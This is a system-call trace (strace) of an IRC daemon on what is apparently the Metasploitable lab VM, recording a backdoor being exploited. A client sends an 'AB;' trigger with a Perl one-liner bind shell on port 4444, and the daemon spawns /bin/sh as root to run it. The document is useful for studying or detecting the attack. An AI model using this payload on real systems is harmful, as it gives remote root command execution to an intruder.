4519  20:13:28.757403 select(1024, [2 3 4 7 9], [], NULL, {0, 470000}) = 1 (in [4], left {0, 120000})
4519  20:13:29.104333 clock_gettime(CLOCK_MONOTONIC, {48018, 921341662}) = 0
4519  20:13:29.104333 recv(4, "PRIVMSG  #testit0 Hiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii\n", 8192, 0) = 55
4519  20:13:29.104333 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:29.104333 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:29.104333 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:29.104334 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:29.104334 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:29.104334 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:29.104343 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:29.104357 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:29.104371 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:29.104384 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:29.104397 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:29.104411 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:29.104424 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:29.104459 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:29.144765 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:29.144871 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:29.144924 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:29.144958 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:29.144985 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:29.145009 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:29.145025 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:29.145039 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:29.145058 gettimeofday({1495671209, 145061}, NULL) = 0
4519  20:13:29.145070 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {0, 530000})
4519  20:13:29.615100 clock_gettime(CLOCK_MONOTONIC, {48019, 432141571}) = 0
4519  20:13:29.615161 time(NULL)        = 1495671209
4519  20:13:29.615172 time(NULL)        = 1495671209
4519  20:13:29.615184 gettimeofday({1495671209, 615187}, NULL) = 0
4519  20:13:29.615195 select(1024, [2], [], NULL, {0, 0}) = 1 (in [2], left {0, 0})
4519  20:13:29.615234 clock_gettime(CLOCK_MONOTONIC, {48019, 432246558}) = 0
4519  20:13:29.615244 gettimeofday({1495671209, 615248}, NULL) = 0
4519  20:13:29.615254 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {1, 0})
4519  20:13:29.615293 clock_gettime(CLOCK_MONOTONIC, {48019, 432305446}) = 0
4519  20:13:29.615304 accept(2, 0, NULL) = 5
4519  20:13:29.615326 getpeername(5, {sa_family=AF_INET, sin_port=htons(33517), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0
4519  20:13:29.615356 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)
4519  20:13:29.615369 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0
4519  20:13:29.615382 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0
4519  20:13:29.615394 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0
4519  20:13:29.615405 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0
4519  20:13:29.615416 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0
4519  20:13:29.615428 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0
4519  20:13:29.615444 clock_gettime(CLOCK_MONOTONIC, {48019, 432457331}) = 0
4519  20:13:29.615456 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6
4519  20:13:29.615467 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)
4519  20:13:29.615499 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0
4519  20:13:29.615511 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0
4519  20:13:29.615548 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0
4519  20:13:29.615564 send(6, "\357H\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39
4519  20:13:29.615687 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)
4519  20:13:29.615746 gettimeofday({1495671209, 615750}, NULL) = 0
4519  20:13:29.615758 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {0, 970000})
4519  20:13:29.644333 clock_gettime(CLOCK_MONOTONIC, {48019, 461341720}) = 0
4519  20:13:29.644333 recvfrom(6, "\357H\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\1\6\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116
4519  20:13:29.644333 close(6)          = 0
4519  20:13:29.644333 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)
4519  20:13:29.644333 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 174, 0) = 174
4519  20:13:29.644334 time(NULL)        = 1495671209
4519  20:13:29.644346 time(NULL)        = 1495671209
4519  20:13:29.644358 gettimeofday({1495671209, 644362}, NULL) = 0
4519  20:13:29.644370 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)
4519  20:13:29.644400 clock_gettime(CLOCK_MONOTONIC, {48019, 461412949}) = 0
4519  20:13:29.644411 gettimeofday({1495671209, 644414}, NULL) = 0
4519  20:13:29.644421 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [7], left {0, 920000})
4519  20:13:29.744922 clock_gettime(CLOCK_MONOTONIC, {48019, 561958657}) = 0
4519  20:13:29.744985 recv(7, "PRIVMSG  #testit1 Hiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii\n", 8192, 0) = 55
4519  20:13:29.745030 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:29.745060 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:29.745084 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:29.745099 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:29.745112 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:29.745126 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:29.745139 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:29.745153 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:29.745166 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:29.745180 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:29.745193 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:29.745207 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:29.745220 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:29.745233 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:29.745246 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:29.745260 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:29.745273 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:29.745286 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:29.745300 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:29.745314 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:29.745347 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:29.745389 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 130000}, ...}) = 0
4519  20:13:29.745407 gettimeofday({1495671209, 745427}, NULL) = 0
4519  20:13:29.745452 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})
4519  20:13:29.745494 clock_gettime(CLOCK_MONOTONIC, {48019, 562507446}) = 0
4519  20:13:29.745506 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244
4519  20:13:29.745534 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0
4519  20:13:29.745555 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0
4519  20:13:29.745568 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
4519  20:13:29.745582 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 11117
11117 20:13:29.745657 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0
11117 20:13:29.745671 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0
11117 20:13:29.745682 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
11117 20:13:29.745696 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0
11117 20:13:29.745801 brk(0)            = 0x80f9000
11117 20:13:29.745824 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
11117 20:13:29.745893 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f79000
11117 20:13:29.745911 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
11117 20:13:29.745930 open("/etc/ld.so.cache", O_RDONLY) = 1
11117 20:13:29.745943 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0
11117 20:13:29.745963 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f71000
11117 20:13:29.745987 close(1)          = 0
11117 20:13:29.745998 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
11117 20:13:29.746013 open("/lib/libncurses.so.5", O_RDONLY) = 1
11117 20:13:29.746026 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512
11117 20:13:29.746120 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0
11117 20:13:29.746137 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f41000
11117 20:13:29.746149 mmap2(0xb7f6e000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7f6e000
11117 20:13:29.746166 close(1)          = 0
11117 20:13:29.746178 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
11117 20:13:29.746192 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1
11117 20:13:29.746210 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512
11117 20:13:29.746299 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0
11117 20:13:29.746316 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f3d000
11117 20:13:29.746338 mmap2(0xb7f3f000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f3f000
11117 20:13:29.746382 close(1)          = 0
11117 20:13:29.746408 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
11117 20:13:29.746436 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1
11117 20:13:29.746451 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512
11117 20:13:29.746538 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0
11117 20:13:29.746555 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f3c000
11117 20:13:29.746569 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ded000
11117 20:13:29.746580 mmap2(0xb7f36000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f36000
11117 20:13:29.746594 mmap2(0xb7f39000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f39000
11117 20:13:29.746608 close(1)          = 0
11117 20:13:29.746631 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7dec000
11117 20:13:29.746643 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7dec6b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
11117 20:13:29.746698 mprotect(0xb7f36000, 4096, PROT_READ) = 0
11117 20:13:29.746734 munmap(0xb7f71000, 29913) = 0
11117 20:13:29.746760 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
11117 20:13:29.746774 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)
11117 20:13:29.746797 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfe6d030) = -1 ENOTTY (Inappropriate ioctl for device)
11117 20:13:29.746842 brk(0)            = 0x80f9000
11117 20:13:29.746853 brk(0x80fa000)    = 0x80fa000
11117 20:13:29.746893 brk(0x80fb000)    = 0x80fb000
11117 20:13:29.746926 getuid32()        = 0
11117 20:13:29.746936 getgid32()        = 0
11117 20:13:29.746945 geteuid32()       = 0
11117 20:13:29.746953 getegid32()       = 0
11117 20:13:29.746967 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
11117 20:13:29.746981 time(NULL)        = 1495671209
11117 20:13:29.746993 brk(0x80fc000)    = 0x80fc000
11117 20:13:29.747008 brk(0x80fd000)    = 0x80fd000
11117 20:13:29.747028 open("/proc/meminfo", O_RDONLY) = 1
11117 20:13:29.747050 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0
11117 20:13:29.747068 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f78000
11117 20:13:29.747079 read(1, "MemTotal:      1035240 kB\nMemFree:        176756 kB\nBuffers:        141156 kB\nCached:         474388 kB\nSwapCached:          0 kB\nActive:         493744 kB\nInactive:       310356 kB\nHighTotal:      131008 kB\nHighFree:          248 kB\nLowTotal:       904232 kB\nLowFree:        176508 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:             864 kB\nWriteback:           0 kB\nAnonPages:      188588 kB\nMapped:          52016 kB\nSlab:            32472 kB\nSReclaimable:    20128 kB\nSUnreclaim:      12344 kB\nPageTables:       2904 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   707464 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846
11117 20:13:29.747169 close(1)          = 0
11117 20:13:29.747180 munmap(0xb7f78000, 4096) = 0
11117 20:13:29.747191 brk(0x80fe000)    = 0x80fe000
11117 20:13:29.747217 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0
11117 20:13:29.747230 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0
11117 20:13:29.747242 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0
11117 20:13:29.747254 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0
11117 20:13:29.747265 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0
11117 20:13:29.747277 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0
11117 20:13:29.747291 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
11117 20:13:29.747302 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0
11117 20:13:29.747315 uname({sys="Linux", node="metasploitable", ...}) = 0
11117 20:13:29.747417 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
11117 20:13:29.747436 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
11117 20:13:29.747455 brk(0x8100000)    = 0x8100000
11117 20:13:29.747481 getcwd("/etc/unreal", 4096) = 12
11117 20:13:29.747496 getpid()          = 11117
11117 20:13:29.747512 getppid()         = 4519
11117 20:13:29.747528 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
11117 20:13:29.747548 stat64("/sbin/sh", 0xbfe6d008) = -1 ENOENT (No such file or directory)
11117 20:13:29.747560 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0
11117 20:13:29.747577 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0
11117 20:13:29.747601 socket(PF_FILE, SOCK_STREAM, 0) = 1
11117 20:13:29.747613 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0
11117 20:13:29.747625 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)
11117 20:13:29.747647 close(1)          = 0
11117 20:13:29.747658 socket(PF_FILE, SOCK_STREAM, 0) = 1
11117 20:13:29.747668 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0
11117 20:13:29.747678 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)
11117 20:13:29.747697 close(1)          = 0
11117 20:13:29.747713 open("/etc/nsswitch.conf", O_RDONLY) = 1
11117 20:13:29.747727 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0
11117 20:13:29.747743 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f78000
11117 20:13:29.747759 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475
11117 20:13:29.747845 read(1, "", 4096) = 0
11117 20:13:29.747856 close(1)          = 0
11117 20:13:29.747866 munmap(0xb7f78000, 4096) = 0
11117 20:13:29.747910 open("/etc/ld.so.cache", O_RDONLY) = 1
11117 20:13:29.747923 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0
11117 20:13:29.747974 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f71000
11117 20:13:29.747984 close(1)          = 0
11117 20:13:29.747995 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
11117 20:13:29.748010 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1
11117 20:13:29.748041 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 